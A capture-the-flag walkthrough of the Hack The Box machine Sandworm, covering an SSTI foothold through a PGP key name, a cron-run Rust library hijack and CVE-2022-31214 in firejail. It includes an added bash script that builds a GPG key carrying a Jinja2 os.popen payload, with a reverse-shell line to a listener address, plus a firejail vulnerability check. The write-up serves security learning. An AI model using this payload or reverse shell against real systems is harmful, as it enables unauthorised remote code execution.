In this post, I would like to share a walkthrough of the Sandworm machine from Hack The Box.
This box is rated as a medium machine on Hack The Box.
What will you gain from the Sandworm machine?
For the user flag, you need to find a vulnerability in a website that lets users send and receive PGP-encrypted messages and offers a demo area for testing encryption, decryption and signing. The signature verification demo is vulnerable to server-side template injection (SSTI): the identity embedded in the submitted PGP key ends up being rendered by the template engine, so a template expression placed in the key's name is evaluated on the server. Exploiting this flaw gives us a foothold on the machine.
For the root flag, the foothold is confined inside a Firejail sandbox. I locate credentials for the next user in an httpie configuration file. Then I modify a Rust program (its lib.rs source) that the initial user runs from a cron job, which gets me back to that user, this time outside the Firejail sandbox. From there I exploit CVE-2022-31214 in the SUID firejail binary to gain root.
Information Gathering on Sandworm Machine
Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we start information gathering with nmap -sC -sV 10.10.11.218 -oA initial: default scripts and version detection against the top 1000 ports, with the results saved under the prefix initial. A full -p- sweep is worth running in the background as well, but the top-1000 scan below already shows everything we need.
┌─[darknite@parrot]─[~/Document/htb/sandworm]
└──╼ $nmap -sC -sV 10.10.11.218 -oA initial
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-19 00:09 EDT
Nmap scan report for 10.10.11.218
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after:  2050-09-19T18:03:25
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Secret Spy Agency | Secret Security Service
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.42 seconds
┌─[darknite@parrot]─[~/Document/htb/sandworm]
└──╼ $
Port 80 redirects to https://ssa.htb/, so we add that hostname to /etc/hosts and then access the website interface.
Nothing looks interesting on the main pages of the website.
The contact section presents an encrypted PGP message, as shown above, and expects us to communicate the same way.
To take part we need our own PGP key pair: a public key to hand over and a message encrypted or signed with the matching private key.
So let's create a key pair with gpg, using the command above.
gpg asks for a passphrase to protect the new key.
The public key can then be exported with the command above.
With the key in place, we can sign the file we created, as shown above.
The screenshot above shows the signed message that we can use right now.
Boom! The SSTI vector works, as shown above: the verification demo renders the signer's identity from our key through the template engine, and the expression inside it gets evaluated.
So let's edit the key's identity to carry the payload, by executing the command above.
We first test with a harmless 'id' in the GPG key identity, so that we can confirm the injection actually executes commands.
As expected, it works like a charm!
Next we swap 'id' for our reverse shell command, as shown above.
As before, we need to re-sign the message with the modified key, as shown above; since the key identity changed, the public key has to be exported again too, otherwise the demo verifies against the old one.
At last, we have a reverse shell connection, but it is not very stable at all.
Looking around, we find credentials in an httpie configuration file that let us log in to the machine over SSH.
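As an added example (these are not the original post's commands, whose screenshots are not reproduced here), the following bash script performs the key-generation, export and signing steps with a Jinja2 payload placed in the key's real-name field. It assumes the verification demo renders the signer's name through Jinja2, which is why the payload reaches os.popen via self.__init__.__globals__. gpg's unattended key generation with %no-protection is used so no passphrase prompt appears, unlike the interactive flow in the walkthrough. The command is wrapped in base64 so the UID contains no quotes, redirects or angle brackets (gpg rejects '<' and '>' in a name). The e-mail probe@ssa.htb and the listener 10.10.14.5:4444 are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not the original post's code. Builds a GPG key whose UID
# carries a Jinja2 SSTI payload, exports the public key and clearsigns a
# message for the verification demo. Listener address is a placeholder.
set -eu

# Jinja2 payload that reaches os.popen through self.__init__.__globals__.
# Assumes the demo renders the signer's name via render_template_string.
ssti_payload() {
  printf '{{ self.__init__.__globals__.__builtins__.__import__("os").popen("%s").read() }}' "$1"
}

# Base64-wrap an arbitrary command so the key UID has no quotes, redirects
# or angle brackets; the target decodes and runs it.
b64_wrapped() {
  printf 'echo %s|base64 -d|bash' "$(printf '%s' "$1" | base64 | tr -d '\n')"
}

# GnuPG unattended key-generation parameters (gpg(1), "Unattended key generation").
gen_key_params() {
  cat <<EOF
%no-protection
Key-Type: RSA
Key-Length: 2048
Name-Real: $1
Name-Email: $2
Expire-Date: 0
%commit
EOF
}

main() {
  local cmd="$1"                     # start with 'id', then a reverse shell
  local gnupghome; gnupghome="$(mktemp -d)"
  export GNUPGHOME="$gnupghome"      # throwaway keyring, keeps the real one clean

  local name; name="$(ssti_payload "$(b64_wrapped "$cmd")")"
  gen_key_params "$name" "probe@ssa.htb" | gpg --batch --gen-key
  gpg --armor --export probe@ssa.htb > pubkey.asc
  printf 'hello\n' | gpg --armor --clearsign --local-user probe@ssa.htb > signed.asc
  echo "Submit pubkey.asc and signed.asc to the verification demo; re-run with a new command to re-sign"
}

# Usage: ./ssti_key.sh run id
#        ./ssti_key.sh run 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
case "${1:-}" in
  run) main "${2:-id}" ;;
esac
```

Every change of command means a new key identity, so the script regenerates the key, re-exports pubkey.asc and re-signs signed.asc each run; both files must be resubmitted together.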
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges
We find a file called lib.rs, the source of a Rust library crate, which we can abuse later.
So let's run the tipnet program found on the machine to see what it does.
Because the cron job running as atlas executes this code, we can replace the existing lib.rs with our modified copy, as shown above, and wait for the next run.
Boom! At last, we have a reverse shell as atlas, this time outside the Firejail sandbox.
While roaming the machine, we find a binary that catches our attention: firejail.
As expected, firejail is installed with the SUID bit set, which makes it a candidate for CVE-2022-31214.
So we transfer the exploit to the victim machine.
We run the exploit with python3; it prepares the sandbox and prints the firejail command to run next.
In another reverse shell, we execute that firejail --join command and switch to root.
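As an added check (not part of the original post), this bash script confirms the two preconditions the exploit relies on, a setuid-root firejail binary and a version older than the 0.9.70 release that fixed CVE-2022-31214, and documents the second-terminal step. The check and join subcommands, the PID argument and the version-parsing expression are my own; the public PoC prints the exact join instruction to follow.

```bash
#!/usr/bin/env bash
# Added example, not the original post's commands. Verifies the
# preconditions for CVE-2022-31214 and wraps the second-terminal step.
set -eu

# CVE-2022-31214 (firejail --join privilege escalation) is fixed in 0.9.70;
# returns 0 when the given X.Y.Z version predates the fix.
firejail_vulnerable() {
  printf '%s\n' "$1" | awk -F. '{ exit !($1 < 0 || ($1 == 0 && ($2 < 9 || ($2 == 9 && $3 < 70)))) }'
}

# Pull "X.Y.Z" out of `firejail --version` output such as "firejail version 0.9.68".
firejail_version_string() {
  sed -n 's/.*version \([0-9][0-9.]*\).*/\1/p' | head -n1
}

# True if the firejail binary on PATH is setuid and owned by root.
firejail_is_suid() {
  local bin; bin="$(command -v firejail 2>/dev/null)" || return 1
  [ -u "$bin" ] && [ "$(stat -c %U "$bin")" = root ]
}

check() {
  local ver
  ver="$(firejail --version 2>/dev/null | firejail_version_string)" || return 1
  if firejail_is_suid && firejail_vulnerable "$ver"; then
    echo "firejail $ver is setuid root and predates the 0.9.70 fix: CVE-2022-31214 candidate"
  else
    echo "firejail ${ver:-?} does not look exploitable via CVE-2022-31214"
    return 1
  fi
}

# Second terminal: the PoC prints the PID of the sandbox it prepared.
# Joining it gives a shell in which su - yields root (the PoC output
# states the exact command to use).
join_and_root() {
  local pid="$1"
  firejail --join="$pid"
  # inside the joined sandbox:  su -
}

# Usage: ./firejail_check.sh check      (before transferring the exploit)
#        ./firejail_check.sh join <PID> (in the second shell, PID from the PoC)
case "${1:-}" in
  check) check ;;
  join)  join_and_root "$2" ;;
esac
```

Run check first: if the binary is not setuid or the version is 0.9.70 or newer, the exploit will not work and it is better to know that before spending time on file transfers.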
We can read the root flag by running the “cat root.txt” command